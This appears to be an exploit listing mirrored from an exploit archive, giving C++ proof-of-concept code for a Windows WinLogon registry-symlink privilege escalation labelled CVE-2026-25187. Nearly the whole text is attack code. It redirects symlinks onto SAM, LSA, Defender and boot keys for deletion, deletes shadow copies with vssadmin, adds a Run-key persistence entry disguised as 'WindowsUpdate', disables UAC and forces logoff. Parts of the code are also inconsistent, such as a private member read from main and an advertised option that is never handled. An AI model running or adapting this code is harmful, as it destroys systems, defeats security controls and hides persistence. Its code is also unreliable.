Share
## https://sploitus.com/exploit?id=PACKETSTORM:219937
==================================================================================================================================
    | # Title     : WinLogon Registry Deletion Exploit Privilege Escalation PoC                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    : This code represents a highly destructive proof-of-concept CVE-2026-25187 targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise.
                     The exploit is built around abusing Registry symbolic links and session-based Accessibility paths to redirect sensitive system keys into locations affected during user logoff or session transitions.
    
    [+] POC        :  
    
    #include <Windows.h>
    #include <comdef.h>
    #include <stdio.h>
    #include <vector>
    #include <string>
    #include <map>
    #include <thread>
    #include <chrono>
    #include <sddl.h>
    #include <winternl.h>
    #include <aclapi.h>
    #include <lm.h>
    #pragma comment(lib, "advapi32.lib")
    #pragma comment(lib, "user32.lib")
    #pragma comment(lib, "netapi32.lib")
    #define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)
    #define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)
    
    extern "C" {
        NTSTATUS NTAPI NtCreateKey(
            PHANDLE KeyHandle,
            ACCESS_MASK DesiredAccess,
            POBJECT_ATTRIBUTES ObjectAttributes,
            ULONG TitleIndex,
            PUNICODE_STRING Class,
            ULONG CreateOptions,
            PULONG Disposition
        );
    
        NTSTATUS NTAPI NtOpenKeyEx(
            PHANDLE KeyHandle,
            ACCESS_MASK DesiredAccess,
            POBJECT_ATTRIBUTES ObjectAttributes,
            ULONG OpenOptions
        );
    
        NTSTATUS NTAPI NtSetValueKey(
            HANDLE KeyHandle,
            PUNICODE_STRING ValueName,
            ULONG TitleIndex,
            ULONG Type,
            PVOID Data,
            ULONG DataSize
        );
    
        NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);
        NTSTATUS NTAPI NtOpenKey(
            PHANDLE KeyHandle,
            ACCESS_MASK DesiredAccess,
            POBJECT_ATTRIBUTES ObjectAttributes
        );
        
        NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);
        VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
    }
    class RegistryUtils {
    public:
        static std::wstring GetUserSid() {
            HANDLE hToken = nullptr;
            if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
                return L"";
    
            DWORD dwSize = 0;
            GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize);
            
            std::vector<BYTE> buffer(dwSize);
            if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, &dwSize)) {
                CloseHandle(hToken);
                return L"";
            }
    
            PTOKEN_USER pTokenUser = reinterpret_cast<PTOKEN_USER>(buffer.data());
            LPWSTR lpSid = nullptr;
            
            if (!ConvertSidToStringSid(pTokenUser->User.Sid, &lpSid)) {
                CloseHandle(hToken);
                return L"";
            }
    
            std::wstring sid(lpSid);
            LocalFree(lpSid);
            CloseHandle(hToken);
            
            return sid;
        }
    
        static std::wstring RegPathToNative(const std::wstring& path) {
            std::wstring regpath = L"\\Registry\\";
    
            if (path.empty() || path[0] == L'\\')
                return path;
    
            if (path.find(L"HKLM\\") == 0) {
                return regpath + L"Machine\\" + path.substr(5);
            }
            else if (path.find(L"HKU\\") == 0) {
                return regpath + L"User\\" + path.substr(4);
            }
            else if (path.find(L"HKCU\\") == 0) {
                return regpath + L"User\\" + GetUserSid() + L"\\" + path.substr(5);
            }
            else if (path.find(L"HKCR\\") == 0) {
                return regpath + L"Machine\\Software\\Classes\\" + path.substr(5);
            }
            
            return L"";
        }
    
        static bool CreateRegistrySymlink(const std::wstring& symlink, const std::wstring& target, bool isVolatile) {
            std::wstring nativeSymlink = RegPathToNative(symlink);
            std::wstring nativeTarget = RegPathToNative(target);
    
            if (nativeSymlink.empty() || nativeTarget.empty())
                return false;
    
            printf("[*] Creating symlink: %ls -> %ls\n", nativeSymlink.c_str(), nativeTarget.c_str());
            DeleteRegistrySymlink(symlink);
    
            UNICODE_STRING name;
            RtlInitUnicodeString(&name, nativeSymlink.c_str());
    
            OBJECT_ATTRIBUTES objAttr;
            InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
    
            HANDLE hKey = nullptr;
            ULONG disposition = 0;
            
            ULONG options = INTERNAL_REG_OPTION_CREATE_LINK | 
                            (isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);
    
            NTSTATUS status = NtCreateKey(&hKey, KEY_ALL_ACCESS, &objAttr, 0, nullptr, options, &disposition);
            
            if (status != 0) {
                SetLastError(RtlNtStatusToDosError(status));
                return false;
            }
    
            UNICODE_STRING valueName;
            RtlInitUnicodeString(&valueName, L"SymbolicLinkValue");
    
            status = NtSetValueKey(hKey, &valueName, 0, REG_LINK, 
                                   (PVOID)nativeTarget.c_str(), 
                                   nativeTarget.length() * sizeof(WCHAR));
            
            CloseHandle(hKey);
            
            if (status != 0) {
                SetLastError(RtlNtStatusToDosError(status));
                return false;
            }
    
            printf("[+] Symlink created successfully\n");
            return true;
        }
    
        static bool DeleteRegistrySymlink(const std::wstring& symlink) {
            std::wstring nativeSymlink = RegPathToNative(symlink);
            if (nativeSymlink.empty())
                return false;
    
            UNICODE_STRING name;
            RtlInitUnicodeString(&name, nativeSymlink.c_str());
    
            OBJECT_ATTRIBUTES objAttr;
            InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);
    
            HANDLE hKey = nullptr;
            NTSTATUS status = NtOpenKeyEx(&hKey, DELETE, &objAttr, 0);
            
            if (status != 0) {
                return true;
            }
    
            status = NtDeleteKey(hKey);
            CloseHandle(hKey);
    
            return status == 0;
        }
    
        static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring& subKey) {
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
                return false;
            }
            DWORD index = 0;
            WCHAR valueName[256];
            DWORD valueNameSize = 256;
            
            while (RegEnumValueW(hKey, index++, valueName, &valueNameSize, nullptr, 
                                  nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
                RegDeleteValueW(hKey, valueName);
                valueNameSize = 256;
                index--;
            }
            index = 0;
            WCHAR subKeyName[256];
            DWORD subKeyNameSize = 256;
            
            while (RegEnumKeyExW(hKey, index++, subKeyName, &subKeyNameSize, nullptr,
                                  nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
                std::wstring fullPath = subKey + L"\\" + subKeyName;
                DeleteRegistryTreeManual(rootKey, fullPath);
                subKeyNameSize = 256;
                index--;
            }
    
            RegCloseKey(hKey);
            return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;
        }
    };
    
    class WinLogonEoPExploit {
    private:
        std::wstring m_sessionPath;
        std::vector<std::pair<std::wstring, std::wstring>> m_targets;
        bool m_persistentMode;
        
        void InitializeTargets() {
    
            m_targets = {
                {L"uac_bypass", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"},
                {L" defender", L"HKLM\\SOFTWARE\\Microsoft\\Windows Defender"},
                {L"security_policies", L"HKLM\\SECURITY\\Policy"},
                {L"lsa_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"},
                {L"sam_key", L"HKLM\\SAM\\SAM\\Domains\\Account"},
                {L"cached_creds", L"HKLM\\SECURITY\\Cache"},
                {L"ci_policies", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Policy"},
                {L"code_integrity", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard"},
                {L"uac_settings", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\UAC"},
                {L"boot_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Boot"},
                {L"winlogon", L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"},
                {L"critical_services", L"HKLM\\SYSTEM\\CurrentControlSet\\Services"},
            };
        }
    
        std::wstring BuildSessionPath() {
            DWORD sessionId = 0;
            ProcessIdToSessionId(GetCurrentProcessId(), &sessionId);
            
            wchar_t path[512];
            swprintf_s(path, L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session%d\\ATConfig", 
                       sessionId);
            return std::wstring(path);
        }
    
        bool PrepareRegistryTarget(const std::wstring& targetPath) {
            printf("[*] Preparing target: %ls\n", targetPath.c_str());
    
            std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);
            if (nativeTarget.empty()) {
                printf("[!] Invalid target path\n");
                return false;
            }
    
            HKEY hKey = nullptr;
            std::wstring cleanPath = targetPath;
    
            if (cleanPath.find(L"HKLM\\") == 0) {
                cleanPath = cleanPath.substr(5);
            }
            
            if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,
                                REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,
                                &hKey, nullptr) == ERROR_SUCCESS) {
                DWORD dummy = 0xDEADBEEF;
                RegSetValueExW(hKey, L"exploit_marker", 0, REG_DWORD, 
                              (BYTE*)&dummy, sizeof(dummy));
                RegCloseKey(hKey);
                printf("[+] Target key created/verified\n");
            }
            
            return true;
        }
    
        bool CreateMaliciousSymlink(const std::wstring& targetPath) {
            printf("\n[*] Creating malicious registry symlink...\n");
    
            std::wstring pathWithoutHKLM = m_sessionPath;
            if (pathWithoutHKLM.find(L"HKLM\\") == 0) {
                pathWithoutHKLM = pathWithoutHKLM.substr(5);
            }
    
            RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());
    
            if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {
                printf("[!] Failed to create symlink: %d\n", GetLastError());
                return false;
            }
            
            return true;
        }
    
        bool TriggerLogout() {
            printf("\n[*] Triggering user logout...\n");
    
            BOOL result = FALSE;
    
            result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
            if (result) {
                printf("[+] Logout initiated via ExitWindowsEx\n");
                return true;
            }
    
            result = InitiateSystemShutdownExW(nullptr, L"System will logout for maintenance",
                                               5, TRUE, TRUE, 
                                               SHTDN_REASON_MAJOR_APPLICATION);
            if (result) {
                printf("[+] Logout initiated via InitiateSystemShutdownEx\n");
                return true;
            }
            HANDLE hToken = nullptr;
            if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
                TOKEN_PRIVILEGES tp;
                LUID luid;
                if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, &luid)) {
                    tp.PrivilegeCount = 1;
                    tp.Privileges[0].Luid = luid;
                    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
                    AdjustTokenPrivileges(hToken, FALSE, &tp, 0, nullptr, 0);
                }
                CloseHandle(hToken);
            }
            
            result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
            
            return result != FALSE;
        }
    
        void DisableRecoveryMechanisms() {
    
            printf("[*] Disabling recovery mechanisms...\n");
    
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, 
                             L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Configuration Manager",
                             0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                DWORD disable = 1;
                RegSetValueExW(hKey, L"LastKnownGoodEnabled", 0, REG_DWORD, 
                              (BYTE*)&disable, sizeof(disable));
                RegCloseKey(hKey);
            }
    
            system("vssadmin delete shadows /all /quiet > nul 2>&1");
        }
    
    public:
        WinLogonEoPExploit(bool persistentMode = false) 
            : m_persistentMode(persistentMode) {
            InitializeTargets();
        }
    
        bool ExploitSingleTarget(const std::wstring& targetName, const std::wstring& targetPath) {
            printf("\n=== Attacking target: %ls ===\n", targetName.c_str());
    
            if (!PrepareRegistryTarget(targetPath))
                return false;
    
            if (!CreateMaliciousSymlink(targetPath))
                return false;
    
            if (!TriggerLogout()) {
                printf("[!] Failed to trigger logout\n");
                return false;
            }
    
            return true;
        }
    
        bool ExploitMultipleTargets() {
            printf("\n");
            printf("========================================\n");
            printf("  CVE-2026-25187 - WinLogon EoP Exploit\n");
            printf("  Registry Deletion to SYSTEM\n");
            printf("========================================\n\n");
    
            m_sessionPath = BuildSessionPath();
            printf("[*] Session path: %ls\n", m_sessionPath.c_str());
    
            RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
            
            if (m_persistentMode) {
                AddPersistence();
            }
    
            DisableRecoveryMechanisms();
    
            printf("\n[*] Available targets:\n");
            for (size_t i = 0; i < m_targets.size(); i++) {
                printf("    [%zu] %ls - %ls\n", i, m_targets[i].first.c_str(), m_targets[i].second.c_str());
            }
            
            printf("\n[*] Targeting all critical keys for maximum impact...\n");
    
            for (const auto& target : m_targets) {
    
                RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
                
                if (CreateMaliciousSymlink(target.second)) {
                    printf("[+] Symlink created for %ls\n", target.first.c_str());
    
                    Sleep(100);
                }
            }
    
            printf("\n[*] Triggering final logout for mass deletion...\n");
            TriggerLogout();
            
            return true;
        }
    
        void AddPersistence() {
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(HKEY_CURRENT_USER, 
                             L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                             0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                
                wchar_t path[MAX_PATH];
                GetModuleFileNameW(nullptr, path, MAX_PATH);
                
                RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ, 
                              (BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));
                RegCloseKey(hKey);
                
                printf("[+] Persistence added to HKCU\\Run\n");
            }
        }
    
        bool CreateMassiveRegistryCorruption() {
    
            printf("\n[*] Creating massive registry corruption...\n");
            
            std::vector<std::wstring> extraTargets = {
                L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Executive",
                L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management",
                L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL",
                L"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
                L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
            };
            
            for (const auto& target : extraTargets) {
                RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
                
                if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {
                    printf("[+] Corruption symlink created for: %ls\n", target.c_str());
                    Sleep(50);
                }
            }
            
            return true;
        }
    };
    
    class PrivilegeEscalation {
    public:
        static bool DisableUAC() {
            printf("[*] Disabling UAC...\n");
            
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
                             L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
                             0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                
                DWORD disable = 0;
                RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
                RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
                
                RegCloseKey(hKey);
                printf("[+] UAC disabled (requires reboot)\n");
                return true;
            }
            
            return false;
        }
        
        static bool GrantDebugPrivileges() {
            printf("[*] Granting debug privileges...\n");
            
            HKEY hKey = nullptr;
            if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
                             L"SECURITY\\Policy\\Privileges",
                             0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                RegCloseKey(hKey);
                return true;
            }
            
            return false;
        }
    };
    
    int wmain(int argc, wchar_t* argv[]) {
        printf("\n");
        printf("========================================\n");
        printf("  CVE-2026-25187 - Critical EoP Exploit\n");
        printf("  WinLogon Registry Deletion to SYSTEM\n");
        printf("========================================\n\n");
    
        bool massDeletion = false;
        bool persistent = false;
        int targetIndex = -1;
        
        for (int i = 1; i < argc; i++) {
            if (_wcsicmp(argv[i], L"--mass") == 0) {
                massDeletion = true;
            }
            else if (_wcsicmp(argv[i], L"--persist") == 0) {
                persistent = true;
            }
            else if (_wcsicmp(argv[i], L"--target") == 0 && i + 1 < argc) {
                targetIndex = _wtoi(argv[++i]);
            }
            else if (_wcsicmp(argv[i], L"--help") == 0) {
                printf("Usage: %s [options]\n", argv[0]);
                printf("Options:\n");
                printf("  --mass        Mass delete multiple critical keys\n");
                printf("  --persist     Add persistence to startup\n");
                printf("  --target N    Attack specific target by index\n");
                printf("  --disable-uac Disable UAC after deletion\n");
                printf("\nWARNING: This exploit will cause system instability!\n");
                return 0;
            }
        }
    
        printf("[!] WARNING: This exploit will delete critical registry keys!\n");
        printf("[!] System may become UNBOOTABLE or severely damaged.\n");
        printf("[!] Continue? (y/N): ");
        
        wint_t ch = towlower(getwchar());
        if (ch != L'y') {
            printf("[*] Exploit aborted.\n");
            return 0;
        }
        
        WinLogonEoPExploit exploit(persistent);
        
        bool success = false;
        
        if (massDeletion) {
            printf("\n[*] Running mass deletion mode...\n");
            success = exploit.ExploitMultipleTargets();
            exploit.CreateMassiveRegistryCorruption();
        } else {
            printf("\n[*] Available targets:\n");
            printf("    0 - UAC Bypass (Disable UAC)\n");
            printf("    1 - Windows Defender\n");
            printf("    2 - Security Policies\n");
            printf("    3 - LSA Configuration\n");
            printf("    4 - SAM (Password Hashes)\n");
            printf("    5 - Cached Credentials\n");
            printf("    6 - Code Integrity\n");
            printf("    7 - Boot Configuration (DoS)\n");
            printf("    8 - ALL (Mass Deletion)\n");
            
            int choice = targetIndex;
            if (choice == -1) {
                printf("\n[*] Select target (0-8): ");
                wscanf_s(L"%d", &choice);
            }
            
            if (choice == 8) {
                success = exploit.ExploitMultipleTargets();
            } else if (choice >= 0 && choice < 8) {
                auto& target = exploit.m_targets[choice];
                success = exploit.ExploitSingleTarget(target.first, target.second);
    
                if (choice == 0) {
                    PrivilegeEscalation::DisableUAC();
                }
            }
        }
        
        if (success) {
            printf("\n[+] Exploit triggered! System will logout now.\n");
            printf("[*] After login, check if target registry keys are deleted.\n");
            Sleep(2000);
        } else {
            printf("\n[!] Exploit failed. Try running again or use different target.\n");
        }
        
        return 0;
    }
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================